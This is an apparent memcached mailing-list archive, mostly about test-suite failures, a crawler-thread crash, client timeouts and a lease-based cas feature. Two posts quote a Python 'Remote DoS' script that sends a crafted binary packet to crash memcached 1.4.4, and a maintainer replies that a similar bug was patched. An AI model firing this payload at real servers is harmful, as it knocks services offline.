binary_decr ok 36 - binary_decrq ok 37 - binary_version ok 38 - binary_flush ok 39 - binary_flushq ok 40 - binary_append ok 41 - binary_appendq ok 42 - binary_prepend ok 43 - binary_prependq ok 44 - binary_stat ok 45 - binary_illegal ok 46 - binary_pipeline_hickup SIGINT handled. ok 47 - shutdown ok 48 - stop_server prove ./t t/00-startup.t ... 1/18 getaddrinfo(): Name or service not known failed to listen on TCP port 38181: Success t/00-startup.t ... 
13/18 slab class 1: chunk size 80 perslab 13107 slab class 2: chunk size 104 perslab 10082 slab class 3: chunk size 136 perslab 7710 slab class 4: chunk size 176 perslab 5957 slab class 5: chunk size 224 perslab 4681 slab class 6: chunk size 280 perslab 3744 slab class 7: chunk size 352 perslab 2978 slab class 8: chunk size 440 perslab 2383 slab class 9: chunk size 552 perslab 1899 slab class 10: chunk size 696 perslab 1506 slab class 11: chunk size 872 perslab 1202 slab class 12: chunk size 1096 perslab 956 slab class 13: chunk size 1376 perslab 762 slab class 14: chunk size 1720 perslab 609 slab class 15: chunk size 2152 perslab 487 slab class 16: chunk size 2696 perslab 388 slab class 17: chunk size 3376 perslab 310 slab class 18: chunk size 4224 perslab 248 slab class 19: chunk size 5280 perslab 198 slab class 20: chunk size 6600 perslab 158 slab class 21: chunk size 8256 perslab 127 slab class 22: chunk size 10320 perslab 101 slab class 23: chunk size 12904 perslab 81 slab class 24: chunk size 16136 perslab 64 slab class 25: chunk size 20176 perslab 51 slab class 26: chunk size 25224 perslab 41 slab class 27: chunk size 31536 perslab 33 slab class 28: chunk size 39424 perslab 26 slab class 29: chunk size 49280 perslab 21 slab class 30: chunk size 61600 perslab 17 slab class 31: chunk size 77000 perslab 13 slab class 32: chunk size 96256 perslab 10 slab class 33: chunk size 120320 perslab 8 slab class 34: chunk size 150400 perslab 6 slab class 35: chunk size 188000 perslab 5 slab class 36: chunk size 235000 perslab 4 slab class 37: chunk size 293752 perslab 3 slab class 38: chunk size 367192 perslab 2 slab class 39: chunk size 458992 perslab 2 slab class 40: chunk size 573744 perslab 1 slab class 41: chunk size 717184 perslab 1 slab class 42: chunk size 1048576 perslab 1 26 server listening (auto-negotiate) 27 server listening (auto-negotiate) 28 send buffer was 180224, now 268435456 32 send buffer was 180224, now 268435456 31 server listening (udp) 35 server listening (udp) 30 server listening (udp) 34 server listening (udp) 29 server listening (udp) 33 server listening (udp) 28 server listening (udp) 32 server listening (udp) slab class 1: chunk size 80 perslab 13107 slab class 2: chunk size 104 perslab 10082 slab class 3: chunk size 136 perslab 7710 slab class 4: chunk size 176 perslab 5957 slab class 5: chunk size 224 perslab 4681 slab class 6: chunk size 280 perslab 3744 slab class 7: chunk size 352 perslab 2978 slab class 8: chunk size 440 perslab 2383 slab
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
I don't know. I need to see the output of that program. On Thu, 1 May 2014, Wilfred Khalik wrote: By the way, how RAM is enough RAM? On Friday, May 2, 2014 1:28:57 PM UTC+12, Dormando wrote: What's the output of: $ prove -v t/lru-crawler.t How long are the tests taking to run? This has definitely been tested on ubuntu 12.04 (which is what I assume you meant?), but not something with so little RAM. On Thu, 1 May 2014, Wilfred Khalik wrote: Hi guys, I get the below failure error when I run the make test command: Any help would be appreciated.I am running this on 512MB Digital Ocean VPS by the way on Linux 12.0.4.4 LTS. Slab Stats 64 Thread stats 200 Global stats 208 Settings 124 Item (no cas) 32 Item (cas) 40 Libevent thread 100 Connection 340 libevent thread cumulative 13100 Thread stats cumulative 13000 ./testapp 1..48 ok 1 - cache_create ok 2 - cache_constructor ok 3 - cache_constructor_fail ok 4 - cache_destructor ok 5 - cache_reuse ok 6 - cache_redzone ok 7 - issue_161 ok 8 - strtol ok 9 - strtoll ok 10 - strtoul ok 11 - strtoull ok 12 - issue_44 ok 13 - vperror ok 14 - issue_101 ok 15 - start_server ok 16 - issue_92 ok 17 - issue_102 ok 18 - binary_noop ok 19 - binary_quit ok 20 - binary_quitq ok 21 - binary_set ok 22 - binary_setq ok 23 - binary_add ok 24 - binary_addq ok 25 - binary_replace ok 26 - binary_replaceq ok 27 - binary_delete ok 28 - binary_deleteq ok 29 - binary_get ok 30 - binary_getq ok 31 - binary_getk ok 32 - binary_getkq ok 33 - binary_incr ok 34 - binary_incrq ok 35 - binary_decr ok 36 - binary_decrq ok 37 - binary_version ok 38 - binary_flush ok 39 - binary_flushq ok 40 - binary_append ok 41 - binary_appendq ok 42 - binary_prepend ok 43 - binary_prependq ok 44 - binary_stat ok 45 - binary_illegal ok 46 - binary_pipeline_hickup SIGINT handled. ok 47 - shutdown ok 48 - stop_server prove ./t t/00-startup.t ... 1/18 getaddrinfo(): Name or service not known failed to listen on TCP port 38181: Success t/00-startup.t ... 
13/18 slab class 1: chunk size 80 perslab 13107 slab class 2: chunk size 104 perslab 10082 slab class 3: chunk size 136 perslab 7710 slab class 4: chunk size 176 perslab 5957 slab class 5: chunk size 224 perslab 4681 slab class 6: chunk size 280 perslab 3744 slab class 7: chunk size 352 perslab 2978 slab class 8: chunk size 440 perslab 2383 slab class 9: chunk size 552 perslab 1899 slab class 10: chunk size 696 perslab 1506 slab class 11: chunk size 872 perslab 1202 slab class 12: chunk size 1096 perslab 956 slab class 13: chunk size 1376 perslab 762 slab class 14: chunk size 1720 perslab 609 slab class 15: chunk size 2152 perslab 487 slab class 16: chunk size 2696 perslab 388 slab class 17: chunk size 3376 perslab 310 slab class 18: chunk size 4224 perslab 248 slab class 19: chunk size 5280 perslab 198 slab class 20: chunk size 6600 perslab 158 slab class 21: chunk size 8256 perslab 127 slab class 22: chunk size 10320 perslab 101 slab class 23: chunk size 12904 perslab 81 slab class 24: chunk size 16136 perslab 64 slab class 25: chunk size 20176 perslab 51 slab class 26: chunk size 25224 perslab 41 slab class 27: chunk size 31536 perslab 33 slab class 28: chunk size 39424 perslab 26 slab class 29: chunk size 49280 perslab 21 slab class 30: chunk size 61600 perslab 17 slab class 31: chunk size 77000 perslab 13 slab class 32: chunk size 96256 perslab 10 slab class 33: chunk size 120320 perslab 8 slab class 34: chunk size 150400 perslab 6 slab class 35: chunk size 188000 perslab 5 slab class 36: chunk size 235000 perslab 4 slab class 37: chunk size 293752 perslab 3 slab class 38: chunk size 367192 perslab 2 slab class 39: chunk
Re: Java memcached timeout
http://memcached.org/timeouts also, you haven't said what version you're on of memcached? or provided stats, or etc... On Fri, 25 Apr 2014, Filippe Costa Spolti wrote: Helle guys, Anyone already had a problem similar to this: Caused by: java.util.concurrent.ExecutionException: net.spy.memcached.internal.CheckedOperationTimeoutException: Operation timed out. - failing node: localhost/127.0.0.1:11211 at net.spy.memcached.internal.OperationFuture.get(OperationFuture.java:106) [spymemcached-2.8.1.jar:2.8.1] at net.spy.memcached.internal.GetFuture.get(GetFuture.java:62) [spymemcached-2.8.1.jar:2.8.1] at net.spy.memcached.MemcachedClient.get(MemcachedClient.java:997) [spymemcached-2.8.1.jar:2.8.1] ... 80 more Caused by: net.spy.memcached.internal.CheckedOperationTimeoutException: Operation timed out. - failing node: localhost/127.0.0.1:11211 ? it's happening everyday here.. A new version can fix it? -- Regards, __ Filippe Costa Spolti Linux User n°515639 - http://counter.li.org/ filippespo...@gmail.com Be yourself [IMAGE] -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
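As a starting point while gathering the version and stats dormando asked for, a few counters are commonly checked when chasing client-side timeouts: curr_connections against the configured maxconns, listen_disabled_num (how often the server hit the connection limit and stopped accepting), and conn_yields. A small sketch that pulls just those; host and port are assumptions, and this is only a first-pass check, not a diagnosis:

# Pull a few counters that commonly matter when clients see timeouts.
import socket

def get_stats(cmd="stats", host="127.0.0.1", port=11211):
    s = socket.create_connection((host, port), timeout=5)
    s.sendall((cmd + "\r\n").encode())
    buf = b""
    while not buf.endswith(b"END\r\n"):
        chunk = s.recv(4096)
        if not chunk:
            break
        buf += chunk
    s.close()
    stats = {}
    for line in buf.decode(errors="replace").splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0] == "STAT":
            stats[parts[1]] = parts[2]
    return stats

stats = get_stats()
settings = get_stats("stats settings")
print("curr_connections:", stats.get("curr_connections"),
      "of maxconns:", settings.get("maxconns"))
print("listen_disabled_num:", stats.get("listen_disabled_num"))
print("conn_yields:", stats.get("conn_yields"))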
Re: Memcached vulnerabilitie
what version are you testing? On Wed, 23 Apr 2014, Filippe Costa Spolti wrote: Hello everyone. THis python script crash the memcached. import sys import socket print Memcached Remote DoS - Bursting Clouds yo! if len(sys.argv) != 3: print Usage: %s host port %(sys.argv[0]) sys.exit(1) target = sys.argv[1] port = sys.argv[2] print [+] Target Host: %s %(target) print [+] Target Port: %s %(port) kill = \x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff kill +=\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 kill +=\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) try: hax.connect((target, int(port))) print [+] Connected, firing payload! except: print [-] Connection Failed... Is there even a target? sys.exit(1) try: hax.send(kill) print [+] Payload Sent! except: print [-] Payload Sending Failure... WTF? sys.exit(1) hax.close() print [*] Should be dead... -- Regards, __ Filippe Costa Spolti Linux User n°515639 - http://counter.li.org/ filippespo...@gmail.com Be yourself [IMAGE] -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached vulnerabilitie
can you... try against a version that isn't four years old? we patched something similar to this a while back. On Wed, 23 Apr 2014, Filippe Costa Spolti wrote: memcached 1.4.4 Regards, __ Filippe Costa Spolti Linux User n°515639 - http://counter.li.org/ filippespo...@gmail.com Be yourself [IMAGE] On 04/23/2014 06:24 PM, dormando wrote: what version are you testing? On Wed, 23 Apr 2014, Filippe Costa Spolti wrote: Hello everyone. THis python script crash the memcached. import sys import socket print Memcached Remote DoS - Bursting Clouds yo! if len(sys.argv) != 3: print Usage: %s host port %(sys.argv[0]) sys.exit(1) target = sys.argv[1] port = sys.argv[2] print [+] Target Host: %s %(target) print [+] Target Port: %s %(port) kill = \x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff kill +=\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 kill +=\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) try: hax.connect((target, int(port))) print [+] Connected, firing payload! except: print [-] Connection Failed... Is there even a target? sys.exit(1) try: hax.send(kill) print [+] Payload Sent! except: print [-] Payload Sending Failure... WTF? sys.exit(1) hax.close() print [*] Should be dead... -- Regards, __ Filippe Costa Spolti Linux User n°515639 - http://counter.li.org/ filippespo...@gmail.com Be yourself [IMAGE] -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Add a feature 'strong cas', developed from 'lease' that mentioned in Facebook's paper
Well I haven't read the lease paper yet. Ryan, can folks more familiar with the actual implementation have a look through it maybe? On Thu, 17 Apr 2014, Zhiwei Chan wrote: I m working on a trading system, and getting stale data for the system is unaccepted at most of the time. But the high throughput make it impossible to get all data from mysql. So i want to make it more reliable when use memcache as a cache. Facebook's paper Scaling Memcache at Facebook mentions a method called ‘lease' and 'mcsqueal', but the mcsqueal is difficult for my case, because it is hard to get the key for mysql. Adding the 'strong cas' feature is devoted to solve the following typical problems, client A and Client B want to update the same key, and A(set key=1)update database before B(set key=2): key not exist in cache: (A get-miss)-(B get-miss)-(B set key=2) - (A set key=1); or key exist in cache: (A delete key)-(B delete key)-(B set key=2) - (A set key=1); Some thing Wrong! the key=2 in database but key=1 in cache. It is possible to happen in a high concurrent system, and i don't find a way to solve it with the current cas method. So i add two command 'getss' and 'deletess', they will create a lease and return a cas-unique, or tell the client there already exist lease on the server. the client can do something to prevent stale data. such as wait, or invalidate the pre-lease. I also think the lease is a concept of 'dirty lock', because anybody try to update it will replace itself expiration to the lease's expiration(the lease's expiration time should be very short), so in the worst case(low probability), the stale data only exist in cache for a short time. It is accepted for most app in my case. For more detail information, please read doc/strongcas.txt. And hoping for u guys suggestion ~_~ i have created a pull request on github. https://github.com/memcached/memcached/pull/65 -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
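For readers who haven't seen the paper, the gist of the lease idea can be approximated with stock commands. The sketch below is NOT the proposed getss/deletess behaviour, just a rough illustration of the pattern the proposal formalizes (on a miss, only the client that wins a short-lived lease key repopulates); the client library, key names and TTLs are all assumptions:

# Rough illustration of the lease idea with stock commands only -- this is
# NOT the proposed getss/deletess behaviour. It narrows (but does not close)
# the stale-set window described above.
import time
import memcache

mc = memcache.Client(["127.0.0.1:11211"])

def get_with_lease(key, load_from_db, lease_ttl=5):
    value = mc.get(key)
    if value is not None:
        return value
    # Try to take the lease; add() only succeeds if nobody else holds it.
    if mc.add("lease:" + key, "1", time=lease_ttl):
        value = load_from_db(key)
        mc.set(key, value)
        mc.delete("lease:" + key)
        return value
    # Someone else is repopulating; wait briefly and retry the cache.
    time.sleep(0.05)
    return mc.get(key) or load_from_db(key)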
Re: 1.4.18
Well, that learns me for trying to write software without the 10+ VM buildbots... The i386 one, can you include the output of stats settings, and also manually run: lru_crawler enable (or start with -o lru_crawler) then run stats settings again please? Really weird that it fails there, but not the lines before it looking for the OK while enabling it. On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Thanks! At least there're still people trying to maintain it for some distros... On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote: http://code.google.com/p/memcached/wiki/ReleaseNotes1418 I just tried building the Arch Linux package for this and got failures when running the test suite. This was the output from the 32-bit i686 build; I saw the same results building for x86_64. Let me know what other relevant information might help. # Failed test at t/lru-crawler.t line 45. # got: undef # expected: 'yes' t/lru-crawler.t .. Failed 96/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok t/udp.t .. ok t/unixsocket.t ... ok t/whitespace.t ... skipped: Skipping tests probably because you don't have git. Test Summary Report --- t/lru-crawler.t (Wstat: 13 Tests: 94 Failed: 1) Failed test: 94 Non-zero wait status: 13 Parse errors: Bad plan. You planned 189 tests but ran 94. Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr 0.05 sys + 2.27 cusr 0.35 csys = 3.43 CPU) Result: FAIL Makefile:1376: recipe for target 'test' failed make: *** [test] Error 1 == ERROR: A failure occurred in check(). Aborting... Running out of a git checkout on x86_64, I get slightly different results: t/item_size_max.t ok t/line-lengths.t . ok t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. # got: '0' # expected: '30' # Looks like you failed 2 tests of 189. t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200) Failed 2/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok t/udp.t .. ok t/unixsocket.t ... ok t/whitespace.t ... 1/120 # Failed test '0001-Support-V-version-option.patch (see devtools/clean-whitespace.pl)' # at t/whitespace.t line 40. t/whitespace.t ... 27/120 # Looks like you failed 1 test of 120. t/whitespace.t ... Dubious, test returned 1 (wstat 256, 0x100) Failed 1/120 subtests Test Summary Report --- t/lru-crawler.t (Wstat: 512 Tests: 189 Failed: 2) Failed tests: 96-97 Non-zero exit status: 2 t/whitespace.t (Wstat: 256 Tests: 120 Failed: 1) Failed test: 1 Non-zero exit status: 1 Files=48, Tests=7193, 115 wallclock secs ( 1.39 usr 0.15 sys + 5.39 cusr 1.02 csys = 7.95 CPU) Result: FAIL Makefile:1482: recipe for target 'test' failed make: *** [test] Error 1 $ git describe 1.4.18 $ uname -a Linux galway 3.14.1-1-ARCH #1 SMP PREEMPT Mon Apr 14 20:40:47 CEST 2014 x86_64 GNU/Linux $ gcc --version gcc (GCC) 4.8.2 20140206 (prerelease) Copyright (C) 2013 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
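For the check requested above, both commands can be run over the text protocol; a small sketch that enables the crawler at runtime and then dumps the lru_crawler-related lines from stats settings (host and port are assumptions):

# Sketch of the checks requested above: enable the crawler at runtime and
# dump the lru_crawler-related lines from "stats settings".
import socket

def text_command(cmd, host="127.0.0.1", port=11211):
    s = socket.create_connection((host, port), timeout=5)
    s.sendall((cmd + "\r\n").encode())
    buf = b""
    while not (buf.endswith(b"END\r\n") or buf.endswith(b"OK\r\n")
               or buf.endswith(b"ERROR\r\n")):
        chunk = s.recv(4096)
        if not chunk:
            break
        buf += chunk
    s.close()
    return buf.decode(errors="replace")

print(text_command("lru_crawler enable").strip())      # expect "OK"
for line in text_command("stats settings").splitlines():
    if "lru_crawler" in line:
        print(line)                                     # e.g. "STAT lru_crawler yes"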
Re: 1.4.18
On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote: Well, that learns me for trying to write software without the 10+ VM buildbots... The i386 one, can you include the output of stats settings, and also manually run: lru_crawler enable (or start with -o lru_crawler) then run stats settings again please? Really weird that it fails there, but not the lines before it looking for the OK while enabling it. As soon as I type lru_crawler enable, memcached crashes. I see this in dmesg. [189571.108397] traps: memcached-debug[31776] general protection ip:f7749988 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000] [189969.840918] traps: memcached-debug[2600] general protection ip:7f976510a1c8 sp:7f976254aed8 error:0 in libpthread-2.19.so[7f97650f9000+18000] [195892.554754] traps: memcached-debug[31871] general protection ip:f76f0988 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000] Starting with -o lru_crawler also crashes. [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000] This is running both 32 bit and 64 bit executables on the same build box; note in the above dmesg output that two of them appear to be from 32-bit processes, and we also see a crash in what looks a lot like a 64 bit pointer address, if I'm reading this right... Uhh... is your cross compile goofed? Any chance you could start the memcached-debug binary under gdb and then crash it the same way? Get a full stack trace. Thinking if I even have a 32bit host left somewhere to test with... will have to spin up the VM's later, but a stacktrace might be enlightening anyway. Thanks! On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Didn't change anything, same two failures with the same output listed. I feel like something's a bit different between your two tests. In the first set, it's definitely not crashing for the 64bit test, but not working either. Is something weird going on with the second set of tests? You noted it seems to be running a 32bit binary still. Thanks! At least there're still people trying to maintain it for some distros... On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote: http://code.google.com/p/memcached/wiki/ReleaseNotes1418 I just tried building the Arch Linux package for this and got failures when running the test suite. This was the output from the 32-bit i686 build; I saw the same results building for x86_64. Let me know what other relevant information might help. # Failed test at t/lru-crawler.t line 45. # got: undef # expected: 'yes' t/lru-crawler.t .. Failed 96/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok t/udp.t .. ok t/unixsocket.t ... ok t/whitespace.t ... skipped: Skipping tests probably because you don't have git. Test Summary Report --- t/lru-crawler.t (Wstat: 13 Tests: 94 Failed: 1) Failed test: 94 Non-zero wait status: 13 Parse errors: Bad plan. You planned 189 tests but ran 94. Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr 0.05 sys + 2.27 cusr 0.35 csys = 3.43 CPU) Result: FAIL Makefile:1376: recipe for target 'test' failed make: *** [test] Error 1 == ERROR: A failure occurred in check(). Aborting... Running out of a git checkout on x86_64, I get slightly different results: t/item_size_max.t ok t/line-lengths.t . 
ok t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. # got: '0' # expected: '30' # Looks like you failed 2 tests of 189. t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200) Failed 2/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok
Re: 1.4.18
Er... reading comprehension fail. I meant 64bit binary still at the bottom there. On Sat, 19 Apr 2014, dormando wrote: On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote: Well, that learns me for trying to write software without the 10+ VM buildbots... The i386 one, can you include the output of stats settings, and also manually run: lru_crawler enable (or start with -o lru_crawler) then run stats settings again please? Really weird that it fails there, but not the lines before it looking for the OK while enabling it. As soon as I type lru_crawler enable, memcached crashes. I see this in dmesg. [189571.108397] traps: memcached-debug[31776] general protection ip:f7749988 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000] [189969.840918] traps: memcached-debug[2600] general protection ip:7f976510a1c8 sp:7f976254aed8 error:0 in libpthread-2.19.so[7f97650f9000+18000] [195892.554754] traps: memcached-debug[31871] general protection ip:f76f0988 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000] Starting with -o lru_crawler also crashes. [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000] This is running both 32 bit and 64 bit executables on the same build box; note in the above dmesg output that two of them appear to be from 32-bit processes, and we also see a crash in what looks a lot like a 64 bit pointer address, if I'm reading this right... Uhh... is your cross compile goofed? Any chance you could start the memcached-debug binary under gdb and then crash it the same way? Get a full stack trace. Thinking if I even have a 32bit host left somewhere to test with... will have to spin up the VM's later, but a stacktrace might be enlightening anyway. Thanks! On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Didn't change anything, same two failures with the same output listed. I feel like something's a bit different between your two tests. In the first set, it's definitely not crashing for the 64bit test, but not working either. Is something weird going on with the second set of tests? You noted it seems to be running a 32bit binary still. Thanks! At least there're still people trying to maintain it for some distros... On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote: http://code.google.com/p/memcached/wiki/ReleaseNotes1418 I just tried building the Arch Linux package for this and got failures when running the test suite. This was the output from the 32-bit i686 build; I saw the same results building for x86_64. Let me know what other relevant information might help. # Failed test at t/lru-crawler.t line 45. # got: undef # expected: 'yes' t/lru-crawler.t .. Failed 96/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok t/udp.t .. ok t/unixsocket.t ... ok t/whitespace.t ... skipped: Skipping tests probably because you don't have git. Test Summary Report --- t/lru-crawler.t (Wstat: 13 Tests: 94 Failed: 1) Failed test: 94 Non-zero wait status: 13 Parse errors: Bad plan. You planned 189 tests but ran 94. Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr 0.05 sys + 2.27 cusr 0.35 csys = 3.43 CPU) Result: FAIL Makefile:1376: recipe for target 'test' failed make: *** [test] Error 1 == ERROR: A failure occurred in check(). Aborting... 
Running out of a git checkout on x86_64, I get slightly different results: t/item_size_max.t ok t/line-lengths.t . ok t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. # got: '0' # expected: '30' # Looks like you failed 2 tests of 189. t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200) Failed 2/189 subtests t/lru.t .. ok t/maxconns.t
Re: 1.4.18
On Sat, 19 Apr 2014, Dan McGee wrote: On Sat, Apr 19, 2014 at 1:45 PM, dormando dorma...@rydia.net wrote: On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote: Well, that learns me for trying to write software without the 10+ VM buildbots... The i386 one, can you include the output of stats settings, and also manually run: lru_crawler enable (or start with -o lru_crawler) then run stats settings again please? Really weird that it fails there, but not the lines before it looking for the OK while enabling it. As soon as I type lru_crawler enable, memcached crashes. I see this in dmesg. [189571.108397] traps: memcached-debug[31776] general protection ip:f7749988 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000] [189969.840918] traps: memcached-debug[2600] general protection ip:7f976510a1c8 sp:7f976254aed8 error:0 in libpthread-2.19.so[7f97650f9000+18000] [195892.554754] traps: memcached-debug[31871] general protection ip:f76f0988 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000] Starting with -o lru_crawler also crashes. [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000] This is running both 32 bit and 64 bit executables on the same build box; note in the above dmesg output that two of them appear to be from 32-bit processes, and we also see a crash in what looks a lot like a 64 bit pointer address, if I'm reading this right... Uhh... is your cross compile goofed? Any chance you could start the memcached-debug binary under gdb and then crash it the same way? Get a full stack trace. Thinking if I even have a 32bit host left somewhere to test with... will have to spin up the VM's later, but a stacktrace might be enlightening anyway. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xf7dbfb40 (LWP 7)] 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0 (gdb) bt #0 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0 #1 0xf7f790e0 in __pthread_mutex_unlock_usercnt () from /usr/lib/libpthread.so.0 #2 0xf7f79bff in pthread_cond_wait@@GLIBC_2.3.2 () from /usr/lib/libpthread.so.0 #3 0x08061bfe in item_crawler_thread () #4 0xf7f75f20 in start_thread () from /usr/lib/libpthread.so.0 #5 0xf7ead94e in clone () from /usr/lib/libc.so.6 Holy crap lock elision. I have one machine with a haswell chip here, but I'll have to USB boot. Is getting an Arch liveimage especially time consuming? https://github.com/dormando/memcached/tree/crawler_fix Can you try this? The lock elision might've made my undefined behavior mistake of not holding a lock before initially waiting on the condition fatal. A further fix might be required, as it's possible someone could kill the do_etc flag before the thread fully starts and it'd drop out with the lock held. That would be an incredible feat though. Thanks! On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Didn't change anything, same two failures with the same output listed. I feel like something's a bit different between your two tests. In the first set, it's definitely not crashing for the 64bit test, but not working either. Is something weird going on with the second set of tests? You noted it seems to be running a 32bit binary still. I'm willing to ignore the 64-bit failures for now until we figure out the 32-bit ones. 
In any case, I wouldn't blame the cross-compile or toolchain, these have all been built in very clean, single architecture systemd-nspawn chroots. Thanks, I'm just trying to reason why it's failing in two different ways. The initial failure of finding 90 items when it expected 60 is a timing glitch, the other ones are this thread crashing the daemon.
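To make the lock-elision failure mode above concrete: pthread_cond_wait() must be entered with its mutex held, and waiting without it is undefined behaviour that TSX lock elision turns into the __lll_unlock_elision fault in the backtrace. The sketch below is not the crawler_fix patch itself, just the generic pattern a background thread like item_crawler_thread() needs: lock before the first wait, re-check the predicate after every wakeup, and only drop the mutex while doing real work. (Build with -pthread.)

    #include <pthread.h>
    #include <stdbool.h>
    #include <stdio.h>
    #include <unistd.h>

    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
    static pthread_cond_t  cond = PTHREAD_COND_INITIALIZER;
    static bool work_ready   = false;
    static bool keep_running = true;

    static void *worker(void *arg) {
        (void)arg;
        pthread_mutex_lock(&lock);               /* the step the bug skipped */
        while (keep_running) {
            while (!work_ready && keep_running)
                pthread_cond_wait(&cond, &lock); /* atomically unlocks/relocks */
            if (!keep_running) break;
            work_ready = false;
            pthread_mutex_unlock(&lock);
            puts("worker: crawling...");         /* real work happens unlocked */
            pthread_mutex_lock(&lock);
        }
        pthread_mutex_unlock(&lock);
        return NULL;
    }

    int main(void) {
        pthread_t tid;
        pthread_create(&tid, NULL, worker, NULL);

        pthread_mutex_lock(&lock);               /* wake the worker for one pass */
        work_ready = true;
        pthread_cond_signal(&cond);
        pthread_mutex_unlock(&lock);
        sleep(1);

        pthread_mutex_lock(&lock);               /* then ask it to shut down */
        keep_running = false;
        pthread_cond_signal(&cond);
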